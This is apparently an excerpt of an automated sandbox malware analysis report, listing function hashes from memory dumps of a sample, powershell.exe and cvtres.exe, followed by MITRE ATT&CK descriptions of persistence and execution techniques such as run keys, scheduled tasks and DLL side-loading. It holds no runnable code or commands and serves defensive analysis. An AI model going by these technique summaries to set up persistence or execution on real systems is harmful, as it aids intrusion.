Instruction Fuzzy Hash: 15F05C3254C6478FE315A31CD811BE4B791DF713B0F1903BBC084C71D2CA5DA0858341

Function 00007FF848F4185D Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3238228979.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4648cc3632d3b55e3ebf6da5ff9fe57c9ad850be92e991debc9371a0c37bafc
Instruction ID: 0bda4fb2cb8115f74dbb97c895007e14a2a13616c30790e10f27fd0e31f11cb5
Opcode Fuzzy Hash: c4648cc3632d3b55e3ebf6da5ff9fe57c9ad850be92e991debc9371a0c37bafc
Instruction Fuzzy Hash: 26F02771C1CA984FE350AB24446D1B87BA0FF283D0F44007BD808D61E2EF285484835A

Function 00007FF8490EB4CE Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3329963457.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc98502aeec2db39f27084dcf1ad81c232682d52e8bda7e1316c77de50a10e01
Instruction ID: 60fc74c8d5ef1b6a1a68bfdb03d8c1f68691f0df8aae92fa2d168df294d4c511
Opcode Fuzzy Hash: fc98502aeec2db39f27084dcf1ad81c232682d52e8bda7e1316c77de50a10e01
Instruction Fuzzy Hash: 57D01700F1C95A0EDEA9B67C34552BD51C2CBC9690B9058B6E10DC22CADD5CDC831381

Function 00007FF848F45C40 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3238228979.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5347116a938bcbcd7b527e8efcdac7526105b1051d5dde3f51e3eb5aa2b11b64
Instruction ID: 2f3a791106d45e4797ab596df6f6587feca9363e363676f58e086dddd65ba40f
Opcode Fuzzy Hash: 5347116a938bcbcd7b527e8efcdac7526105b1051d5dde3f51e3eb5aa2b11b64
Instruction Fuzzy Hash: C1F06D7082864D9FEB55FF6484486EAB7F4FF14345F5004BAE81DC2191EB34A2A4CB44

Function 00007FF848F410AD Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3238228979.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12d0d5c2e0e76f837e0a3e977b5ef930f545d73ea3b22fce36debe8fc30d2412
Instruction ID: 6eb6c1b4130e04c06ff84bbbb293c3282d583b92c0cd7230e750e9ab289627a7
Opcode Fuzzy Hash: 12d0d5c2e0e76f837e0a3e977b5ef930f545d73ea3b22fce36debe8fc30d2412
Instruction Fuzzy Hash: D9E0C23284E6CC4FDB91BB2449120D97F60FF51200F8502DBE818870C3E76991188382

Function 00007FF8490F59B7 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3329963457.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ed99df7b917d59f7394e6380c8cf82fab5c5d794093e910e35ecbb12675bc1f
Instruction ID: cddc0a8dd7a927583e3f692d66ae8169e1b4c6531a2300740c3b735b85302dc5
Opcode Fuzzy Hash: 5ed99df7b917d59f7394e6380c8cf82fab5c5d794093e910e35ecbb12675bc1f
Instruction Fuzzy Hash: E9E0B630D5995B8FDFA9EF188844BB8B7B8EB08740F1100F4901DD2246CE345A818F00

Function 00007FF848F43770 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3238228979.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a4f1ba8903d63d28e1cce7cddd699e8fe1db6ac20532827cb31d7d73e679c35
Instruction ID: 1753643e6dcdd82f555b98575884258efa3dfab7f6d4455e9f1ad7808be7a42c
Opcode Fuzzy Hash: 1a4f1ba8903d63d28e1cce7cddd699e8fe1db6ac20532827cb31d7d73e679c35
Instruction Fuzzy Hash: B5C0803555C5014FF390770CF8507A4E390FB403A0F900537E809965E1CB5D74C14705

Function 00007FF848F41C2B Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3238228979.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e30ce118af1638dcbcb91e1924c1c9999a83303c9a32609f7d8e5b7aafdb6d8
Instruction ID: bb0e4ab83bd060e900817f7d8526cbbf37693b5a6c3c367867b327fad7f5dc9f
Opcode Fuzzy Hash: 5e30ce118af1638dcbcb91e1924c1c9999a83303c9a32609f7d8e5b7aafdb6d8
Instruction Fuzzy Hash: 01C09231C2C42E9EE368B3E184844FDA2615FA4BC0F244632D10BF24C5EF386A80A15C

Function 00007FF848F41C1E Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3238228979.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd595d301ae50ccd5d4ac6d9ed52ee4a299ff4bf0f7c8388fc7f4ecf45328e4a
Instruction ID: 6b4775b2ffb7fd7d6201a6e950610c40ef2ffc97897d55cebada97bdee1429a6
Opcode Fuzzy Hash: cd595d301ae50ccd5d4ac6d9ed52ee4a299ff4bf0f7c8388fc7f4ecf45328e4a
Instruction Fuzzy Hash: 7BB092E1C0C5535FF2113B5008A31B807206F71B80F1208B3C20AA10C32E1D2246102E

Function 00007FF848F4171E Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3238228979.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef5c4694e66c00b7f2c46b5ab4501fae3e5861e9932fd0cbcbdb5db0edb36086
Instruction ID: 2344e72f4b31774e3df7e9d99f05d35625c67f063baf675f61cf934f3a402928
Opcode Fuzzy Hash: ef5c4694e66c00b7f2c46b5ab4501fae3e5861e9932fd0cbcbdb5db0edb36086
Instruction Fuzzy Hash: D5A024304C74050FC044F334C4C105031C05FC5100FD00074C40CC11D3DD4F1C444741

Function 00007FF848F4371D Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3238228979.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c59005d591e656db54b7ae786e54b34383deeeae2c766a757c968aec141b9c6
Instruction ID: c29e020ec6da6a614b4efcb2581f46d3642d1389e34a14e8c8e3817c4d39c415
Opcode Fuzzy Hash: 5c59005d591e656db54b7ae786e54b34383deeeae2c766a757c968aec141b9c6
Instruction Fuzzy Hash: C3B0483090C4078EF264B3188050A3A11A24BA8BD8F20443AC09EA6AC2CE28B8029618

Function 00007FF848F42975 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3238228979.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60c1a870ccaf81f2755b2d4dce9338375ffd4c218063e4ca4e7b50896e5226b7
Instruction ID: 186b84deb6bfaf4b79ae9dc679c25a95709315f1d8b3c2c348978d7559ae3afe
Opcode Fuzzy Hash: 60c1a870ccaf81f2755b2d4dce9338375ffd4c218063e4ca4e7b50896e5226b7
Instruction Fuzzy Hash: 1DB01231D0C1034EF16432B0080407C00830FE1AC4F690A33D80F7B1C3EE383841225C

Function 00007FF848F4534F Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3238228979.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7113c07f4f70f3c09d7e3854b190dfa3ef50cd9b7d8b67b546f5d5e7bc36b81f
Instruction ID: 888d9914d5aaf44f3629484abcd464be517fcecae4ebe5b7c773e75ac131c667
Opcode Fuzzy Hash: 7113c07f4f70f3c09d7e3854b190dfa3ef50cd9b7d8b67b546f5d5e7bc36b81f
Instruction Fuzzy Hash: 10B01220F0C11E4DF5B43724002003C00826FACA80F601037C40EEE1C6CE1C78581008

Non-executed Functions

Function 00007FF8490E16F9 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

8WI, xrefs: 00007FF8490E1765

Memory Dump Source

Source File: 00000000.00000002.3329963457.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490e0000_file.jbxd

Similarity

API ID:
String ID: 8WI
API String ID: 0-2750051610
Opcode ID: f585c6ab8a2b5b22b1189adc7a57ca1128308110550e2701a73cd85d924a6ba5
Instruction ID: 750d7351470766b58fa6d7610dee2b28c8cf1192490c69618b95b3bddbad05c3
Opcode Fuzzy Hash: f585c6ab8a2b5b22b1189adc7a57ca1128308110550e2701a73cd85d924a6ba5
Instruction Fuzzy Hash: 4961E62191F6D55FD792BB78A8555E63FB0EF46268B0801FBD0C8CF0A3CA1CA446C765

Function 00007FF8490E397A Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3329963457.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be3901272389793da9f41c035b2ea7d04798f70d8ad196c3d79731b62d4e1e49
Instruction ID: 4ec9715ed57ad80eb33b19b3db03b960047676e8151f6f82ffafea82e42ff1d7
Opcode Fuzzy Hash: be3901272389793da9f41c035b2ea7d04798f70d8ad196c3d79731b62d4e1e49
Instruction Fuzzy Hash: 2091C412D0E1C29FEB61BB7CA4661F67F60EF02798B1C01BAD08C4D097DA1DA44AC295

Function 00007FF8490E4BE0 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3329963457.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c961855d7376dd08bea6ddfd3ffc0b617d77a6f2817ca65460800e672a648a3
Instruction ID: a6d3d9fcee1dcedb122002615c6128d9ff2e003704095cdc3242a7be51d6f28f
Opcode Fuzzy Hash: 3c961855d7376dd08bea6ddfd3ffc0b617d77a6f2817ca65460800e672a648a3
Instruction Fuzzy Hash: A661771381F6D2BAE755BB7CA4560E63BA0EF0227DB1C4277D0CC4D093DE1D644A86A9

Function 00007FF8490F2A8D Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3329963457.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ebce171492e9a25567277f43af0316ae6717f5801b84a5f11c01c29b2b76503
Instruction ID: 24165213035379745685a9dcf5c091b71437d0f0f7a38244b39c2900c0512921
Opcode Fuzzy Hash: 2ebce171492e9a25567277f43af0316ae6717f5801b84a5f11c01c29b2b76503
Instruction Fuzzy Hash: F3118C31D0D559DFDB64EF98D8546FDB3B2FF85351F10117AD009A728ACA78AA44CB40

Function 00007FF848F45DF8 Relevance: 5.2, Strings: 4, Instructions: 219COMMON

Download Yara Rule

Strings

!#, xrefs: 00007FF848F45F96
K_^, xrefs: 00007FF848F45F01
"+, xrefs: 00007FF848F45F8E
#3, xrefs: 00007FF848F45F86

Memory Dump Source

Source File: 00000000.00000002.3238228979.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_file.jbxd

Similarity

API ID:
String ID: !#$"+$#3$K_^
API String ID: 0-896192085
Opcode ID: 513de905289a857c770ea10dca8b530be504fae9db78ecd29cb163af1e7391b1
Instruction ID: 34a54e5391147ac0422576d52d5ca5d417df6ac07bdbc55296d86fa2336dbfca
Opcode Fuzzy Hash: 513de905289a857c770ea10dca8b530be504fae9db78ecd29cb163af1e7391b1
Instruction Fuzzy Hash: 5D514B27E2F526A8A19132BD74420EE5BA4EF956FDF084377E14C8D1C34E0C648682FD

Analysis Process: powershell.exePID: 5644, Parent PID: 984COMMON

Executed Functions

Function 00007FF849006605 Relevance: 6.7, Strings: 5, Instructions: 433COMMON

Download Yara Rule

Strings

(B%I, xrefs: 00007FF849006858
(B%I, xrefs: 00007FF849006974
(B%I, xrefs: 00007FF84900678C
(B%I, xrefs: 00007FF8490067C3
(B%I, xrefs: 00007FF8490066ED

Memory Dump Source

Source File: 00000002.00000002.2189551038.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID: (B%I$(B%I$(B%I$(B%I$(B%I
API String ID: 0-1877043794
Opcode ID: aff91be8bc9769f8c419c77f2b3d016055cba1606bae8ade722e399ef3be027f
Instruction ID: 9a423803cb9d46288cdc39e77ce62ae90a1fa281f0935f5f37fb4eea426a8b7b
Opcode Fuzzy Hash: aff91be8bc9769f8c419c77f2b3d016055cba1606bae8ade722e399ef3be027f
Instruction Fuzzy Hash: CBD13431D0EACA5FEB65EF2868155B5BBE2EF16354B0402FED04DD7093EA18E845C351

Function 00007FF849004073 Relevance: 1.4, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

8>%I, xrefs: 00007FF84900413A

Memory Dump Source

Source File: 00000002.00000002.2189551038.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID: 8>%I
API String ID: 0-3722309147
Opcode ID: 21cab9a0b7451b04be64d0d09f145719d081056b0cb57579d961247855c9a0a3
Instruction ID: 39cc2e336964fff6860292c3abd259a23372189eb732f46c0a45c5beb9ab8489
Opcode Fuzzy Hash: 21cab9a0b7451b04be64d0d09f145719d081056b0cb57579d961247855c9a0a3
Instruction Fuzzy Hash: 45512A32E0DA8A4FEBA9EE2C64115B577E2EF95260F5801FAC14DC7193FE28EC158345

Function 00007FF849004370 Relevance: 1.4, Strings: 1, Instructions: 150COMMON

Download Yara Rule

Strings

p>%I, xrefs: 00007FF8490043ED

Memory Dump Source

Source File: 00000002.00000002.2189551038.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID: p>%I
API String ID: 0-2206047945
Opcode ID: fc382e31203a2448604222d420459e7ba59df7e506dc897676025d6f6dd111cf
Instruction ID: e38ffe2f54d102f6aa825ffceb3b734f862c80b33120e226af1b0a45f845a5f2
Opcode Fuzzy Hash: fc382e31203a2448604222d420459e7ba59df7e506dc897676025d6f6dd111cf
Instruction Fuzzy Hash: 2441E332E0DA894FEBB9EA2C74516B877E1EF85660B0811FAC14DC7187FA18EC158385

Function 00007FF8490040BF Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

8>%I, xrefs: 00007FF84900413A

Memory Dump Source

Source File: 00000002.00000002.2189551038.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID: 8>%I
API String ID: 0-3722309147
Opcode ID: 83ba3b3b7b37a2f738339aeda9d9ae852acaf1500a842d0e89993541d5015dcd
Instruction ID: bd0a0fc4d4fec5ac63737c221b6bafd62205d291e9b0e3373de1207ff896fe80
Opcode Fuzzy Hash: 83ba3b3b7b37a2f738339aeda9d9ae852acaf1500a842d0e89993541d5015dcd
Instruction Fuzzy Hash: 6D21B132E0DA874FEBB9EE2864511B476D1EF642A0B5901F9C04DC7193FE28EC548249

Function 00007FF8490043BC Relevance: 1.3, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

p>%I, xrefs: 00007FF8490043ED

Memory Dump Source

Source File: 00000002.00000002.2189551038.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID: p>%I
API String ID: 0-2206047945
Opcode ID: a745e7c45fa22fda3382c8adea436b21f0166d2b8827a8b8ddf4762a82ba97d0
Instruction ID: 5d1f96255531f03929eb4de0c4aecd3409f76e6f85eeb3bdebdad2deee1d119a
Opcode Fuzzy Hash: a745e7c45fa22fda3382c8adea436b21f0166d2b8827a8b8ddf4762a82ba97d0
Instruction Fuzzy Hash: A911E032D1E6CA4FEBB5EE28B8945B87BD1EF40660B4910FAD10DC7097FA18EC448345

Function 00007FF848F39FF4 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2188837954.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38ea6f90326493d9cc5be08f5b918b6a05be16a0674f77decd20fbe9b4c9e1b1
Instruction ID: ae3692d764eeead74001a27a8816fc3e38016d87293357fdb56373db156a63a4
Opcode Fuzzy Hash: 38ea6f90326493d9cc5be08f5b918b6a05be16a0674f77decd20fbe9b4c9e1b1
Instruction Fuzzy Hash: 5841B677D0EEC54FE341F73DA8960E97B90EF526ADF1801BBC0884B093EE1A54898759

Function 00007FF848F39768 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2188837954.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63542ab2efdc572ac7a5387990f97b0a89c5a890ff53e7e3810ef5a736399c11
Instruction ID: 2114ddb817ef95389fd530e01294caa16270cb536d2bc2c1ba52ad667c5ad094
Opcode Fuzzy Hash: 63542ab2efdc572ac7a5387990f97b0a89c5a890ff53e7e3810ef5a736399c11
Instruction Fuzzy Hash: 2531F63191CB489FDB1C9F1CA8066B97BE0FBA9311F00422FE449D3691CB70A856CBC2

Function 00007FF848E1E380 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2187537065.00007FF848E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848e1d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a85bb330d1c9a275de249d41cb0554fb13cb3c16ee5376f46132bd464d12ff83
Instruction ID: b650c717262460df8f8eb1a431ff6c9db6334ed5f093e4bd63db1f1422a02c73
Opcode Fuzzy Hash: a85bb330d1c9a275de249d41cb0554fb13cb3c16ee5376f46132bd464d12ff83
Instruction Fuzzy Hash: AA41127080DBC54FE79A9B2898419523FB0FF56354F1506EFE089CB1A3DB25A846C792

Function 00007FF848F3A47C Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2188837954.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0a83943e544e6cd9f3872ee07ffbd9aca048f190927cc7a5235e4a8ff01bed3
Instruction ID: c79d2514fe299eaa18db0b7a34df758f2238ac3b65b74348242364aa4f18736a
Opcode Fuzzy Hash: b0a83943e544e6cd9f3872ee07ffbd9aca048f190927cc7a5235e4a8ff01bed3
Instruction Fuzzy Hash: FA21687080C7888FEB09DB689C8A6F87FB4EF53320F08419BD444CB1A3DA785846CB61

Function 00007FF848F333B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2188837954.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
Instruction ID: 1fde1e7c06bd8ad01fde8fdacf519f27676798cf7977af127a8e772823c5939c
Opcode Fuzzy Hash: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
Instruction Fuzzy Hash: 9501677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45

Non-executed Functions

Function 00007FF848F38BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

L_^F, xrefs: 00007FF848F38C7A
L_^J, xrefs: 00007FF848F38C8A
L_^4, xrefs: 00007FF848F38BFA
L_^7, xrefs: 00007FF848F38C12

Memory Dump Source

Source File: 00000002.00000002.2188837954.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID: L_^4$L_^7$L_^F$L_^J
API String ID: 0-3225005683
Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
Instruction ID: 0907d21456b919f780f717bd5e1c1cb1acc8cc2b6eeb632774ad829765d359f1
Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
Instruction Fuzzy Hash: A52126B761A025AED3417BBDB8045EE3750DF942B8B4552B3D2988F043EB1C70868AE4

Analysis Process: cvtres.exePID: 7216, Parent PID: 1028COMMON

Executed Functions

Function 0000000140001140 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2151286932.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_cvtres.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69feff347bfda074aa7f07e48b7f2b5744d9c7d3b152f021baa2038210904211
Instruction ID: e76669c8f4f670c94b621c8b927ebc9d9c9485ce5bf3cc4b479e0f1cdb2a001a
Opcode Fuzzy Hash: 69feff347bfda074aa7f07e48b7f2b5744d9c7d3b152f021baa2038210904211
Instruction Fuzzy Hash: B7B012B050030884E306AF13F8413C93660674C7C0F400000F70813372C67940404B10

Analysis Process: cvtres.exePID: 1120, Parent PID: 7236COMMON

Executed Functions

Function 0000000140001140 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.3336060981.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_140000000_cvtres.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69feff347bfda074aa7f07e48b7f2b5744d9c7d3b152f021baa2038210904211
Instruction ID: e76669c8f4f670c94b621c8b927ebc9d9c9485ce5bf3cc4b479e0f1cdb2a001a
Opcode Fuzzy Hash: 69feff347bfda074aa7f07e48b7f2b5744d9c7d3b152f021baa2038210904211
Instruction Fuzzy Hash: B7B012B050030884E306AF13F8413C93660674C7C0F400000F70813372C67940404B10

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

